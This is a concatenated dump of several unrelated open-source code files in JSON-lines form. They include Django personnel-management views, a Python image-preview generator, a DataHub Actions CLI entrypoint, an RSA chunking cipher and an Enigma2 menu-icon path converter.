get_certificate(request):\n\n if request.method == 'GET':\n fpid = ''.join(str(request.GET.get('fid')).split('-'))\n\n Certificate_info = T_PersonnelCertificate.objects.filter(Q(FPID=fpid))\n\n dict = convert_to_dicts(Certificate_info)\n resultdict = {'code':0, 'msg':\"\", 'count': Certificate_info.count(), 'data': dict}\n\n return JsonResponse(resultdict, safe=False)\n\n\n\n#链接上传入场安全培训窗口\ndef showTrain_upload(request):\n fid = ''.join(str(request.GET.get('fid')).split('-'))\n\n obj = PersonModelForm()\n\n if request.method == 'POST':\n fid = request.POST.get('FPID')\n Person_info = T_Personnel.objects.get(Q(FID=fid))\n\n if request.POST.get('FIsSafetrain') == 'on':\n Person_info.FIsSafetrain = True\n else:\n Person_info.FIsSafetrain = False\n\n if request.POST.get('FSafetrainDate') == '':\n Person_info.FSafetrainDate = None\n else:\n Person_info.FSafetrainDate = request.POST.get('FSafetrainDate')\n\n if Person_info.FSafetrainHour == '':\n Person_info.FSafetrainHour = 0\n else:\n Person_info.FSafetrainHour = request.POST.get('FSafetrainHour')\n\n Person_info.FEntranceannex = request.FILES.get('FEntranceannex')\n Person_info.save()\n\n url = '/personnel/showTrain_upload?fid='+request.POST.get('FPID')\n return redirect(url)\n\n else:\n return render(request, \"content/personnel/safetrainupload.html\", {'obj': obj, 'fid': fid})\n\n\n#链接上传人员照片窗口\ndef showPhoto_upload(request):\n fid = ''.join(str(request.GET.get('fid')).split('-'))\n\n obj = PersonModelForm()\n\n if request.method == 'POST':\n fid = request.POST.get('FPID')\n Person_info = T_Personnel.objects.get(Q(FID=fid))\n\n Person_info.FPhoto = request.FILES.get('FPhoto')\n Person_info.save()\n\n url = '/personnel/showPhoto_upload?fid='+request.POST.get('FPID')\n return redirect(url)\n\n else:\n return render(request, \"content/personnel/photoupload.html\", {'obj': obj, 'fid': fid})\n\n\n\n#入场安全培训数据源\ndef get_safetrain(request):\n\n if request.method == 'GET':\n fid = ''.join(str(request.GET.get('fid')).split('-'))\n\n Person_info = T_Personnel.objects.filter(Q(FID=fid))\n\n dict = convert_to_dicts(Person_info)\n resultdict = {'code':0, 'msg':\"\", 'count': Person_info.count(), 'data': dict}\n\n return JsonResponse(resultdict, safe=False)\n\n\n#获取沃土平台token\ndef get_wotutoken(prjid, callsigcode):\n try:\n devinterface_info = devinterface.objects.get(Q(CREATED_PRJ=prjid), Q(FCallSigCode=callsigcode))\n initID = ''.join(str(devinterface_info.FID).split('-'))\n\n APPFID = devinterface_info.FAppFID\n\n app_info = appkey.objects.get(Q(FID=APPFID))\n\n APPID = app_info.FAppID\n APPKEY = app_info.FAppkey\n APPSECRET = app_info.FAppSecret\n TIMESTAMP = round(app_info.FAppCreateTime.timestamp() * 1000)\n\n strkey = APPKEY + str(TIMESTAMP) + APPSECRET\n md_5 = hashlib.md5()\n md_5.update(strkey.encode(\"utf-8\"))\n SIGN = md_5.hexdigest()\n\n token = get_interface_result(initID, [APPID, APPKEY, str(TIMESTAMP), SIGN], [], [APPID])['data']\n\n return token\n except ObjectDoesNotExist:\n return ''\n\n\n#上传数据至沃土平台\ndef upload_person(request):\n if request.method == 'POST':\n prj_id = request.session['PrjID']\n response_data = {}\n\n upload_info = T_Personnel.objects.filter(Q(FWoTuGUID__isnull=True), Q(CREATED_PRJ=prj_id), ~Q(FStatus=2))\n\n if upload_info.count() == 0:\n response_data['result'] = 1\n\n return HttpResponse(json.dumps(response_data))\n\n devinterface_info = devinterface.objects.get(Q(FScope=0), Q(FCallSigCode='UPLOADPERSON'), Q(CREATED_PRJ=prj_id))\n APPFID = devinterface_info.FAppFID\n initID = ''.join(str(devinterface_info.FID).split('-'))\n\n app_info = appkey.objects.get(Q(FID=APPFID))\n APPID = app_info.FAppID\n TOKEN = get_wotutoken(prj_id, 'TOKENWOTU')\n\n for rows in upload_info:\n person_name = rows.FName\n person_idcard = rows.FIDcard\n if rows.FTel == None:\n person_tel = ''\n else:\n person_tel = rows.FTel\n person_type = str(rows.FType)\n\n result = get_interface_result(initID, [APPID, TOKEN, person_name, person_idcard, person_tel, person_type],[],[APPID])\n\n if result['result'] == 1:\n rows.FWoTuGUID = result['data']['guid']\n rows.save()\n\n response_data['result'] = 1\n else:\n response_data['result'] = 0\n response_data['msg'] = result['msg']\n\n return HttpResponse(json.dumps(response_data))\n\n\n#批量注册人脸至沃土平台\ndef regface_person(request):\n if request.method == 'POST':\n prj_id = request.session['PrjID']\n response_data = {}\n\n regface_info = T_Personnel.objects.filter(Q(FWoTuGUID__isnull=False), Q(CREATED_PRJ=prj_id), Q(FWoTuFaceGUID__isnull=True), ~Q(FPhoto=\"\"))\n\n if regface_info.count() == 0:\n response_data['result'] = 1\n\n return HttpResponse(json.dumps(response_data))\n\n devinterface_info = devinterface.objects.get(Q(FScope=0), Q(FCallSigCode='REGFACE'), Q(CREATED_PRJ=prj_id))\n initID = ''.join(str(devinterface_info.FID).split('-'))\n\n APPFID = devinterface_info.FAppFID\n app_info = appkey.objects.get(Q(FID=APPFID))\n APPID = app_info.FAppID\n TOKEN = get_wotutoken(prj_id, 'TOKENWOTU')\n #TOKEN = interfacesrvdata.objects.get(Q(FCallSigCode='WOTU_APP'), Q(FTag='TOKEN')).FValue\n\n for rows in regface_info:\n person_guid = rows.FWoTuGUID\n\n hostpath = request.get_host()\n imagepath = \"http://\" + hostpath + \"/media/\" + str(rows.FPhoto)\n #imagepath = \"http://39.106.148.205/media/\" + str(rows.FPhoto)\n\n result = get_interface_result(initID, [APPID, TOKEN, person_guid, imagepath], [], [APPID, person_guid])\n\n if result['result'] == 1:\n rows.FWoTuFaceGUID = result['data']['guid']\n rows.save()\n\n response_data['result'] = 1\n\n else:\n response_data['result'] = 0\n response_data['msg'] = result['msg']\n\n break\n\n return HttpResponse(json.dumps(response_data))\n\n\n\n\n","repo_name":"wjcyxx/ISMS","sub_path":"personnel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15800,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"74127685227","text":"# encoding: utf-8\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nimport math\nimport os\n\n\ndef create_preview_image(values, width=270, height=100):\n \"\"\"\n Creates an index preview image based on\n the values passed and returns a PIL image object.\n \"\"\"\n sfactor = 4 # for antialiasing\n padding_top = 21 # distance from top edge to line\n padding_bottom = 4 # distance from bottom edge to line\n padding_x = 5 # distance to the side edges\n radius_min = 0 # minimal circle radius\n swidth = width * sfactor\n sheight = height * sfactor\n circle_linewidth = 1\n stem_linewidth = 1\n stem_color = '#444444'\n sheight_range = (sheight - (padding_top * sfactor) -\n (padding_bottom * sfactor))\n num_values = len(values)\n slot_width = (swidth - (2 * (padding_x * sfactor))) / num_values\n img = Image.new(\"RGB\", (swidth, sheight), \"#FFFFFF\")\n draw = ImageDraw.Draw(img)\n y_bottom = sheight - (padding_bottom * sfactor)\n slotcount = 0\n for value in values:\n x = (slot_width / 2) + (slotcount * slot_width) + (padding_x * sfactor)\n y_top = padding_top * sfactor + ((1 - value) * sheight_range)\n r = radius(value, radius_min) * sfactor\n draw.line((x, y_top, x, y_bottom), fill=stem_color, width=(stem_linewidth * sfactor))\n # rear larger ellipse (black)\n draw.ellipse((x - r - (circle_linewidth * sfactor), y_top - r - (circle_linewidth * sfactor),\n x + r + (circle_linewidth * sfactor), y_top + r + (circle_linewidth * sfactor)),\n fill=(0, 0, 0), outline=(0, 0, 0))\n #front ellipse (white)\n draw.ellipse((x - r, y_top - r, x + r, y_top + r),\n fill=(255, 255, 255), outline=(255, 255, 255))\n slotcount += 1\n return img\n\n\ndef radius(v, minr):\n factor = 350.0\n return float(minr) + math.sqrt(factor * v)\n\n\ndef get_folder_path(id, root='.'):\n \"\"\"\n Returns the appropriate relative folder path\n for images with the given id\n \"\"\"\n idstring = \"%03d\" % id\n # three levels of sub folders taken from the last three digits\n return os.sep.join([root, idstring[-1], idstring[-2], idstring[-3], str(id)])\n\n\ndef save_image_versions(img, id, root_path):\n \"\"\"\n Saves the image in all required sizes\n in the appropriate path. Creates subfolders\n as necessary\n \"\"\"\n folder = get_folder_path(id, root_path)\n if not os.access(folder, os.F_OK):\n os.makedirs(folder)\n # preview image for browse page\n browse_img = img.resize((270, 100), Image.ANTIALIAS)\n browse_img = browse_img.convert(\"L\")\n browse_img.save(folder + os.sep + 'pv.png', 'PNG')\n # opengraph / facebook image\n og_img = img.resize((130, 48), Image.ANTIALIAS)\n og_img = og_img.convert(\"L\")\n og_img.save(folder + os.sep + 'og.png', 'PNG')\n\n\nif __name__ == '__main__':\n THUMBS_PATH = 'test/thumbs'\n values = [0.2, 0.8, 0.1, 0.75, 0.23, 0.99, 0.0, 1.0]\n img = create_preview_image(values)\n save_image_versions(img, 123, THUMBS_PATH)\n","repo_name":"okfn/yourtopia","sub_path":"yourtopia/indexpreview.py","file_name":"indexpreview.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"14908053606","text":"from typing import Any, Dict, List\n\n\nclass ValidationError(Exception):\n \"\"\"Exception class to raise Validation Errors.\"\"\"\n pass\n\n\n# Models Definitions \nclass Post:\n \"\"\"Post model and validation.\"\"\"\n\n def __init__(self, title: str, body: str, liked: bool):\n\n self.title = self.valid_title(title)\n self.body = body\n self.liked = liked\n\n @staticmethod\n def valid_title(title: str) -> str:\n \"\"\"Validate the title.\"\"\"\n try:\n assert len(title) > 15\n except AssertionError:\n raise ValidationError(\"Title is too short.\")\n finally:\n return title\n\n def to_dict(self) -> Dict[str, Any]:\n \"\"\"Prepare data to be jsonified.\"\"\"\n return {\n \"title\": self.title,\n \"body\": self.body,\n \"liked\": self.liked\n }\n\n# Connection with DB\ndb = [\n Post(\"Homero with at least 15 characters.\", \"Era um grande cara\", True)\n]\n\n# Repositories\nclass Repository:\n \"\"\"Data management class.\"\"\"\n\n @staticmethod\n def store(post: Post):\n \"\"\"Put the new post on the database.\"\"\"\n db.append(post)\n\n @staticmethod\n def get_all() -> List[Dict[str, Any]]:\n \"\"\"Retrieve the information present on db.\"\"\"\n return [instance.to_dict() for instance in db]","repo_name":"igormcsouza/flask-bluprints","sub_path":"blueprints/blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39797953797","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n # path('admin/', admin.site.urls),\n path('', views.create_jianli, name = 'create_jianli'),\n path('pro_exper', views.pro_exper, name = 'pro_exper'),\n path('work_exper', views.work_exper, name = 'work_exper'),\n path('show_jianli', views.show_jianli, name = 'show_jianli'),\n path('push_jianli1', views.push_jianli1, name = 'push_jianli1'),\n path('push_jianli', views.push_jianli, name = 'push_jianli'),\n path('upload_jianli', views.upload_jianli, name = 'upload_jianli'),\n\n]\n","repo_name":"2396259288/zhilian","sub_path":"jianli/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"14043845378","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 24 18:06:12 2023\r\n\r\n@author: UsaiinBolt\r\n\"\"\"\r\n\r\nimport csv\r\nimport os\r\nfrom fonction import *\r\nimport time\r\n\r\n#setup database\r\n#create the database \r\ndb = sqlite3.connect('Babelio.db')\r\n\r\nc = db.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='Book'\")\r\nresult = c.fetchone()\r\nprint(result)\r\nif not(result):\r\n db.execute('''CREATE TABLE Book\r\n (id INTEGER PRIMARY KEY,\r\n Ean TEXT,\r\n Title TEXT,\r\n Author TEXT,\r\n Rating FLOAT,\r\n RatingNumber INT,\r\n ReviewNumber INT,\r\n Url TEXT,\r\n Babelio_id INT)''')\r\n \r\n #création de la table de tags\r\n db.execute('''CREATE TABLE Tags\r\n (id INTEGER PRIMARY KEY,\r\n idtag INT,\r\n tag TEXT)''')\r\n \r\n #Création de la table faisant la liaison entre les livres et les tags\r\n db.execute('''CREATE TABLE LiaisonTagBook\r\n (book_ean TEXT,\r\n book_title TEXT,\r\n tag_id INTEGER,\r\n PRIMARY KEY (book_ean, tag_id),\r\n FOREIGN KEY (book_ean) REFERENCES Book(Ean),\r\n FOREIGN KEY (book_title) REFERENCES Book(Title),\r\n FOREIGN KEY (tag_id) REFERENCES Tags(idtag))''')\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Définir le chemin du répertoire contenant les fichiers CSV\r\nchemin = 'C:/Users/UsaiinBolt/Documents/Projet librairie/csv_files'\r\n\r\n# Parcourir tous les fichiers du répertoire\r\nfichiernumber = 1\r\nt0=time.time()\r\nt=t0\r\nfor fichier in os.listdir(chemin):\r\n if fichier.endswith(\".csv\"):\r\n # Ouvrir le fichier CSV en mode lecture\r\n with open(os.path.join(chemin, fichier), \"r\") as f:\r\n # Lire toutes les lignes du fichier\r\n lignes = f.readlines()\r\n\r\n # Supprimer les lignes contenant \"#critiques\" ou \"#citations\"\r\n lignes = [ligne for ligne in lignes if \"#critiques\" not in ligne and \"#citations\" not in ligne]\r\n # Afficher chaque ligne restante\r\n lignenumber = 1\r\n for ligne in lignes: \r\n babelio_id = re.findall(r'\\d+',ligne)\r\n babelio_id = int(babelio_id[len(babelio_id)-1])\r\n c = db.cursor()\r\n c.execute(\"SELECT * FROM Book WHERE Babelio_id=?\",(babelio_id,))\r\n result = c.fetchone() \r\n if not result:\r\n ligne = ligne.strip()\r\n Add_to_DB(ligne[1:-1])\r\n print('fichier : ',fichiernumber,' ligne : ',lignenumber,' execution time : ',int((time.time()-t)*1000)/1000,'s time elapsed : ',int(time.time()-t0))\r\n t=time.time()\r\n lignenumber += 1\r\n fichiernumber += 1\r\n\r\n \r\n \r\n","repo_name":"UsaiinBolt/BabelioTagScrapping","sub_path":"Corps.py","file_name":"Corps.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18313286789","text":"from django.db import models\n\n\nclass Group(models.Model):\n\n number = models.IntegerField(\n null=True,\n blank=True)\n name = models.CharField(\n max_length=1,\n null=True,\n blank=True)\n\n def create_activation_code(self):\n from django.utils.crypto import get_random_string\n code = get_random_string(\n length=8,\n allowed_chars='1234567890qwertyuiop'\n )\n self.activation_code = code\n\n","repo_name":"sezimpain/rica_project","sub_path":"group/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42356816140","text":"import logging\nimport platform\nimport sys\n\nimport click\nimport stackprinter\nfrom datahub.cli.cli_utils import get_boolean_env_variable\nfrom prometheus_client import start_http_server\n\nimport datahub_actions as datahub_package\nfrom datahub_actions.cli.actions import actions\n\nlogger = logging.getLogger(__name__)\n\n# Configure logger.\nBASE_LOGGING_FORMAT = (\n \"[%(asctime)s] %(levelname)-8s {%(name)s:%(lineno)d} - %(message)s\"\n)\nlogging.basicConfig(format=BASE_LOGGING_FORMAT)\n\nMAX_CONTENT_WIDTH = 120\n\n\n@click.group(\n context_settings=dict(\n # Avoid truncation of help text.\n # See https://github.com/pallets/click/issues/486.\n max_content_width=MAX_CONTENT_WIDTH,\n )\n)\n@click.option(\n \"--enable-monitoring\",\n type=bool,\n is_flag=True,\n default=False,\n help=\"Enable prometheus monitoring endpoint. You can set the portnumber with --monitoring-port.\",\n)\n@click.option(\n \"--monitoring-port\",\n type=int,\n default=8000,\n help=\"\"\"Prometheus monitoring endpoint will be available on :/metrics.\n To enable monitoring use the --enable-monitoring flag\n \"\"\",\n)\n@click.option(\"--debug/--no-debug\", default=False)\n@click.version_option(\n version=datahub_package.nice_version_name(),\n prog_name=datahub_package.__package_name__,\n)\n@click.option(\n \"-dl\",\n \"--detect-memory-leaks\",\n type=bool,\n is_flag=True,\n default=False,\n help=\"Run memory leak detection.\",\n)\n@click.pass_context\ndef datahub_actions(\n ctx: click.Context,\n enable_monitoring: bool,\n monitoring_port: int,\n debug: bool,\n detect_memory_leaks: bool,\n) -> None:\n # Insulate 'datahub_actions' and all child loggers from inadvertent changes to the\n # root logger by the external site packages that we import.\n # (Eg: https://github.com/reata/sqllineage/commit/2df027c77ea0a8ea4909e471dcd1ecbf4b8aeb2f#diff-30685ea717322cd1e79c33ed8d37903eea388e1750aa00833c33c0c5b89448b3R11\n # changes the root logger's handler level to WARNING, causing any message below\n # WARNING level to be dropped after this module is imported, irrespective\n # of the logger's logging level! The lookml source was affected by this).\n\n # 1. Create 'datahub' parent logger.\n datahub_logger = logging.getLogger(\"datahub_actions\")\n # 2. Setup the stream handler with formatter.\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter(BASE_LOGGING_FORMAT)\n stream_handler.setFormatter(formatter)\n datahub_logger.addHandler(stream_handler)\n # 3. Turn off propagation to the root handler.\n datahub_logger.propagate = False\n # 4. Adjust log-levels.\n if debug or get_boolean_env_variable(\"DATAHUB_DEBUG\", False):\n logging.getLogger().setLevel(logging.INFO)\n datahub_logger.setLevel(logging.DEBUG)\n else:\n logging.getLogger().setLevel(logging.WARNING)\n datahub_logger.setLevel(logging.INFO)\n if enable_monitoring:\n start_http_server(monitoring_port)\n # Setup the context for the memory_leak_detector decorator.\n ctx.ensure_object(dict)\n ctx.obj[\"detect_memory_leaks\"] = detect_memory_leaks\n\n\ndef main(**kwargs):\n # This wrapper prevents click from suppressing errors.\n try:\n sys.exit(datahub_actions(standalone_mode=False, **kwargs))\n except click.exceptions.Abort:\n # Click already automatically prints an abort message, so we can just exit.\n sys.exit(1)\n except click.ClickException as error:\n error.show()\n sys.exit(1)\n except Exception as exc:\n logger.error(\n stackprinter.format(\n exc,\n line_wrap=MAX_CONTENT_WIDTH,\n truncate_vals=10 * MAX_CONTENT_WIDTH,\n suppressed_paths=[r\"lib/python.*/site-packages/click/\"],\n show_vals=False,\n )\n )\n logger.info(\n f\"DataHub Actions version: {datahub_package.__version__} at {datahub_package.__file__}\"\n )\n logger.info(\n f\"Python version: {sys.version} at {sys.executable} on {platform.platform()}\"\n )\n sys.exit(1)\n\n\ndatahub_actions.add_command(actions)\n","repo_name":"acryldata/datahub-actions","sub_path":"datahub-actions/src/datahub_actions/entrypoints.py","file_name":"entrypoints.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"9715420020","text":"# regex intro\n\nimport re, sys\n\npattern = sys.argv[1]\nsearch_string = sys.argv[2]\nmatch = re.match(pattern, search_string)\n\nif match:\n template = \"'{} matches pattern '{}'\"\nelse:\n template = \"'{} doesn't match pattern '{}'\"\n\nprint(template.format(search_string, pattern))\n","repo_name":"thatguysilver/py3oop","sub_path":"ch8/repractice.py","file_name":"repractice.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71772868587","text":"from io import BytesIO\nfrom typing import Callable, Union\n\nfrom Cryptodome import Random\nfrom Cryptodome.Cipher.PKCS1_v1_5 import PKCS115_Cipher\nfrom Cryptodome.PublicKey import RSA\n\nBuffer = Union[bytes, bytearray, memoryview]\n\n\ndef batched(source: Buffer, size: int):\n for i in range(0, len(source), size):\n yield source[i : i + size]\n\n\nclass RsaCipher(PKCS115_Cipher):\n def __init__(\n self,\n key: RSA.RsaKey,\n randfunc: Callable[[int], bytes],\n ):\n self._key = key\n self._randfunc = randfunc\n\n # https://datatracker.ietf.org/doc/html/rfc8017#section-7.2\n # mLen: message octet length\n # k: key octet length\n # mLen <= k - 11\n self._key_length = key.size_in_bytes()\n self._message_length = self._key_length - 11\n\n super().__init__(self._key, self._randfunc)\n\n def encrypt(self, message: Buffer) -> bytes:\n buffer = BytesIO()\n for chunk in batched(message, self._message_length):\n buffer.write(super().encrypt(chunk))\n return buffer.getvalue()\n\n def decrypt(self, ciphertext: Buffer) -> bytes:\n buffer = BytesIO()\n for chunk in batched(ciphertext, self._key_length):\n buffer.write(super().decrypt(chunk, b\"\"))\n return buffer.getvalue()\n\n @classmethod\n def new(cls, key: RSA.RsaKey):\n return cls(key, Random.get_random_bytes)\n","repo_name":"lzl12snd/cmp_backend","sub_path":"backend/utils/weiyi/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75171310506","text":"# -*- coding: utf-8 -*-\n\n# Menu Icon Path Converter\n#\n# Coded/Modified/Adapted by oerlgrey\n# Based on teamBlue image source code\n#\n# This code is licensed under the Creative Commons \n# Attribution-NonCommercial-ShareAlike 3.0 Unported \n# License. To view a copy of this license, visit\n# http://creativecommons.org/licenses/by-nc-sa/3.0/ \n# or send a letter to Creative Commons, 559 Nathan \n# Abbott Way, Stanford, California 94305, USA.\n#\n# If you think this license infringes any rights,\n# please contact me at ochzoetna@gmail.com\n\nfrom Components.Converter.Converter import Converter\nfrom Components.Element import cached\nfrom Tools.Directories import fileExists\nfrom Components.Converter.Poll import Poll\n\nclass PlatoonHDMenuIconPath(Poll, Converter, object):\n\tdef __init__(self, type):\n\t\tPoll.__init__(self)\n\t\tConverter.__init__(self, type)\n\t\tself.poll_interval = 100\n\t\tself.poll_enabled = True\n\t\tself.type = str(type)\n\t\tself.path = \"/usr/share/enigma2/PlatoonHD/menu-icons/\"\n\t\t\n\t\tself.names = [\n\t\t(\"about_screen\", \"info.png\"),\n\t\t(\"animation_setup\", \"setup.png\"),\n\t\t(\"aspectratio_switch\", \"screen.png\"),\n\t\t(\"audio_menu\", \"audio.png\"),\n\t\t(\"audio_setup\", \"audio.png\"),\n\t\t(\"auto_scan\", \"tuner.png\"),\n\t\t(\"autolanguage_setup\", \"language.png\"),\n\t\t(\"autores_setup\", \"screen.png\"),\n\t\t(\"autoshutdown_setup\", \"shutdowntimer.png\"),\n\t\t(\"autotimer_setup\", \"timer.png\"),\n\t\t(\"av_setup\", \"movie_list.png\"),\n\t\t(\"blindscan\", \"tuner.png\"),\n\t\t(\"buttonsetup_setup\", \"setup.png\"),\n\t\t(\"cablescan\", \"tuner.png\"),\n\t\t(\"cam_setup\", \"setup.png\"),\n\t\t(\"channelselection_setup\", \"setup.png\"),\n\t\t(\"ci_assign\", \"setup.png\"),\n\t\t(\"ci_setup\", \"setup.png\"),\n\t\t(\"cooltvguide\", \"epg.png\"),\n\t\t(\"crontimer_edit\", \"timer.png\"),\n\t\t(\"deep_standby\", \"shutdown.png\"),\n\t\t(\"default_lists\", \"paket.png\"),\n\t\t(\"default_wizard\", \"paket.png\"),\n\t\t(\"device_manager\", \"hdd.png\"),\n\t\t(\"device_screen\", \"hdd.png\"),\n\t\t(\"device_setup\", \"hdd.png\"),\n\t\t(\"devicemanager\", \"hdd.png\"),\n\t\t(\"devices_menu\", \"hdd.png\"),\n\t\t(\"display_selection\", \"look.png\"),\n\t\t(\"display_setup\", \"look.png\"),\n\t\t(\"dns_setup\", \"net.png\"),\n\t\t(\"dreamplex\", \"plugin.png\"),\n\t\t(\"dvd_player\", \"dvd.png\"),\n\t\t(\"dvdplayer\", \"dvd.png\"),\n\t\t(\"dvdplayer_setup\", \"dvd.png\"),\n\t\t(\"ecm_info\", \"tuner.png\"),\n\t\t(\"epg_menu\", \"epg.png\"),\n\t\t(\"epg_settings\", \"epg.png\"),\n\t\t(\"epg_setup\", \"epg.png\"),\n\t\t(\"epgloadsave_menu\", \"epg.png\"),\n\t\t(\"epgrefresh\", \"epg.png\"),\n\t\t(\"extended_selection\", \"setup.png\"),\n\t\t(\"factory_reset\", \"reset.png\"),\n\t\t(\"fansetup_config\", \"setup.png\"),\n\t\t(\"fastscan\", \"tuner.png\"),\n\t\t(\"harddisk_check\", \"hdd.png\"),\n\t\t(\"harddisk_convert\", \"hdd.png\"),\n\t\t(\"harddisk_init\", \"hdd.png\"),\n\t\t(\"harddisk_setup\", \"hdd.png\"),\n\t\t(\"hardisk_selection\", \"hdd.png\"),\n\t\t(\"hardreset\", \"restart.png\"),\n\t\t(\"hdmicec\", \"setup.png\"),\n\t\t(\"hotkey_setup\", \"remote.png\"),\n\t\t(\"inadyn_setup\", \"net.png\"),\n\t\t(\"info_screen\", \"info.png\"),\n\t\t(\"infopanel\", \"info.png\"),\n\t\t(\"input_device_setup\", \"remote.png\"),\n\t\t(\"ipbox_client_Start\", \"net.png\"),\n\t\t(\"keyboard\", \"keyb.png\"),\n\t\t(\"keyboard_setup\", \"keyb.png\"),\n\t\t(\"language_setup\", \"language.png\"),\n\t\t(\"lcd4linux\", \"plugin.png\"),\n\t\t(\"lcd_setup\", \"setup.png\"),\n\t\t(\"lcd_skin_setup\", \"setup.png\"),\n\t\t(\"led_giga\", \"setup.png\"),\n\t\t(\"ledmanager\", \"setup.png\"),\n\t\t(\"loadepgcache\", \"setup.png\"),\n\t\t(\"logs_setup\", \"setup.png\"),\n\t\t(\"maintenance_mode\", \"reset.png\"),\n\t\t(\"manual_scan\", \"tuner.png\"),\n\t\t(\"media_player\", \"movie_list.png\"),\n\t\t(\"mediaportal\", \"plugin.png\"),\n\t\t(\"merlin_music_player\", \"audio.png\"),\n\t\t(\"minidlna_setup\", \"net.png\"),\n\t\t(\"movie_list\", \"movie_list.png\"),\n\t\t(\"moviebrowser\", \"movie_list.png\"),\n\t\t(\"multi_quick\", \"plugin.png\"),\n\t\t(\"netafp_setup\", \"net.png\"),\n\t\t(\"netftp_setup\", \"net.png\"),\n\t\t(\"netmounts_setup\", \"net.png\"),\n\t\t(\"netnfs_setup\", \"net.png\"),\n\t\t(\"netrts_setup\", \"net.png\"),\n\t\t(\"netsabnzbd_setup\", \"net.png\"),\n\t\t(\"netsatpi_setup\", \"net.png\"),\n\t\t(\"netsmba_setup\", \"net.png\"),\n\t\t(\"nettelnet_setup\", \"net.png\"),\n\t\t(\"netushare_setup\", \"net.png\"),\n\t\t(\"netvpn_setup\", \"net.png\"),\n\t\t(\"network_info_screen\", \"info.png\"),\n\t\t(\"network_menu\", \"net.png\"),\n\t\t(\"network_setup\", \"net.png\"),\n\t\t(\"numzapext_setup\", \"remote.png\"),\n\t\t(\"openstore\", \"net.png\"),\n\t\t(\"openwebif\", \"setup.png\"),\n\t\t(\"osd3dsetup\", \"screen.png\"),\n\t\t(\"osd_position_setup\", \"screen.png\"),\n\t\t(\"osd_setup\", \"screen.png\"),\n\t\t(\"osdsetup\", \"screen.png\"),\n\t\t(\"parental_setup\", \"look.png\"),\n\t\t(\"password_setup\", \"net.png\"),\n\t\t(\"picturecenterfs\", \"picture.png\"),\n\t\t(\"plugin_select\", \"plugin.png\"),\n\t\t(\"plugin_selection\", \"plugin.png\"),\n\t\t(\"pluginhider_setup\", \"setup.png\"),\n\t\t(\"positioner_setup\", \"tuner.png\"),\n\t\t(\"powertimer_edit\", \"timer.png\"),\n\t\t(\"primary_skin_selector\", \"gui.png\"),\n\t\t(\"pvmc_mainmenu\", \"setup.png\"),\n\t\t(\"rcu select\", \"setup.png\"),\n\t\t(\"rec_setup\", \"setup.png\"),\n\t\t(\"recording_menu\", \"hdd.png\"),\n\t\t(\"recording_setup\", \"hdd.png\"),\n\t\t(\"recordpaths\", \"hdd.png\"),\n\t\t(\"remote_setup\", \"remote.png\"),\n\t\t(\"remotecode\", \"remote.png\"),\n\t\t(\"remotecontrolcode\", \"remote.png\"),\n\t\t(\"rfmod_setup\", \"setup.png\"),\n\t\t(\"run_kodi\", \"movie_list.png\"),\n\t\t(\"sat_ip_client\", \"net.png\"),\n\t\t(\"satfinder\", \"tuner.png\"),\n\t\t(\"saveepgcache\", \"movie_list.png\"),\n\t\t(\"scart_switch\", \"setup.png\"),\n\t\t(\"select_menu\", \"setup.png\"),\n\t\t(\"service_info_screen\", \"info.png\"),\n\t\t(\"service_searching_selection\", \"tuner.png\"),\n\t\t(\"setup_epgenhanced\", \"setup.png\"),\n\t\t(\"setup_epggraphical\", \"setup.png\"),\n\t\t(\"setup_epginfobar\", \"setup.png\"),\n\t\t(\"setup_epginfobargraphical\", \"setup.png\"),\n\t\t(\"setup_epgmulti\", \"setup.png\"),\n\t\t(\"setup_selection\", \"setup.png\"),\n\t\t(\"sibsetup\", \"setup.png\"),\n\t\t(\"skin_setup\", \"setup.png\"),\n\t\t(\"sleep\", \"timer.png\"),\n\t\t(\"software_manager\", \"restart.png\"),\n\t\t(\"software_update\", \"restart.png\"),\n\t\t(\"specialfeatures_menu\", \"setup.png\"),\n\t\t(\"standby\", \"power.png\"),\n\t\t(\"standby_restart_list\", \"shutdowntimer.png\"),\n\t\t(\"start_kodi\", \"movie_list.png\"),\n\t\t(\"startwizzard\", \"paket.png\"),\n\t\t(\"streamconvert\", \"net.png\"),\n\t\t(\"streaming_clients_info_screen\", \"info.png\"),\n\t\t(\"subtitle_selection\", \"setup.png\"),\n\t\t(\"subtitle_setup\", \"setup.png\"),\n\t\t(\"sundtek_control_enter\", \"setup.png\"),\n\t\t(\"supportchannel_ytchannel\", \"plugin.png\"),\n\t\t(\"system_selection\", \"setup.png\"),\n\t\t(\"tempfancontrol\", \"setup.png\"),\n\t\t(\"time_setup\", \"timer.png\"),\n\t\t(\"timer_edit\", \"timer.png\"),\n\t\t(\"timer_menu\", \"timer.png\"),\n\t\t(\"timezone_setup\", \"setup.png\"),\n\t\t(\"timshift_setup\", \"setup.png\"),\n\t\t(\"tuner_setup\", \"tuner.png\"),\n\t\t(\"ui_menu\", 